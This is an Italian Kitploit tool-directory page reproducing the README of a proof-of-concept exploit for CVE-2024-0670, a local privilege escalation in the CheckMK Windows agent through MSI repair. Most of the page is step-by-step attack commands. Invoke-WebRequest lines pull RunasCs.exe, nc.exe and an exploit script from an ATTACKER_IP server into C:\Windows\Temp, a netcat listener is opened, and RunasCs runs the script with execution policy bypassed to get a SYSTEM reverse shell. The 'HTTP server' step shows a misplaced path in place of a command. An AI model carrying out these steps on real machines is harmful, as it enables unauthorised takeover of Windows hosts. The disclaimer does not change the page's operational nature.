Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit — Questo repository contiene una dimostrazione di exploit per CVE-2024-0670, una vulnerabilità di escalation dei privilegi locale che interessa CheckMK Agent per Windows. La vulnerabilità consente a un utente con privilegi bassi di ottenere privilegi di SYSTEM abusando di percorsi di file scrivibili elaborati dal meccanismo di riparazione MSI. | Kitploit
Strumenti/GitHubGitHub/elsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit
Escalation di PrivilegiGenerazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneBinary Exploitation
GitHubelsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit

Vedi Repository
39 mesi faNon ancora revisionato

Informazioni

Questo repository contiene una dimostrazione di exploit per CVE-2024-0670, una vulnerabilità di escalation dei privilegi locale che interessa CheckMK Agent per Windows. La vulnerabilità consente a un utente con privilegi bassi di ottenere privilegi di SYSTEM abusando di percorsi di file scrivibili elaborati dal meccanismo di riparazione MSI.

Condividi

CVE-2024-0670 – Escalation dei privilegi locali dell'Agente CheckMK (PoC)

Questo repository contiene una proof-of-concept semplice e pulita per CVE-2024-0670, una vulnerabilità di escalation dei privilegi locali nell'agente Windows di CheckMK. Un utente con privilegi limitati può ottenere privilegi SYSTEM abusando di percorsi di file temporanei scrivibili eseguiti durante la riparazione MSI.

🔍 Riepilogo della vulnerabilità

  • Vendor: Tribe29
  • CVE: CVE-2024-0670
  • Avviso: https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/

Durante una riparazione MSI, CheckMK esegue file in:

root@kitploit:~
  C:\Windows\Temp\

Se un utente normale può collocare file con nomi prevedibili in quella cartella, può eseguire comandi come NT AUTHORITY\SYSTEM.

Questo exploit inserisce più nomi di file payload e attiva la riparazione MSI per ottenere l'esecuzione come SYSTEM.

📂 File

root@kitploit:~
RunasCs.exe     → runas replacement (plaintext password support)
nc.exe          → Netcat (reverse shell)
exploit.ps1     → CVE-2024-0670 exploit script
README.md       → documentation

🛠 Requisiti

  • Utente Windows con privilegi limitati
  • PowerShell abilitato
  • Agente Windows di CheckMK installato
  • Possibilità di scaricare file
  • Python (per un semplice server HTTP)
  • Listener Netcat sulla macchina dell'attaccante

📡 Avvia il server HTTP

root@kitploit:~
  C:\Windows\Temp\

📥 Scarica gli strumenti sul target

root@kitploit:~
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1

🚀 Esecuzione dell'exploit

Avvia un listener sulla tua macchina:

root@kitploit:~
nc -lvnp 1111
root@kitploit:~
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"

Se l'operazione riesce, riceverai una reverse shell con privilegi SYSTEM.

🔧 Compilare RunasCs manualmente (opzionale)

root@kitploit:~
net4: 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs 

net2: 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs

⚖️ Disclaimer legale

Questo progetto è destinato esclusivamente a scopi educativi e test di penetrazione autorizzati. Non utilizzarlo per scopi illegali. L'autore non è responsabile per un uso improprio.

Scarica lo strumento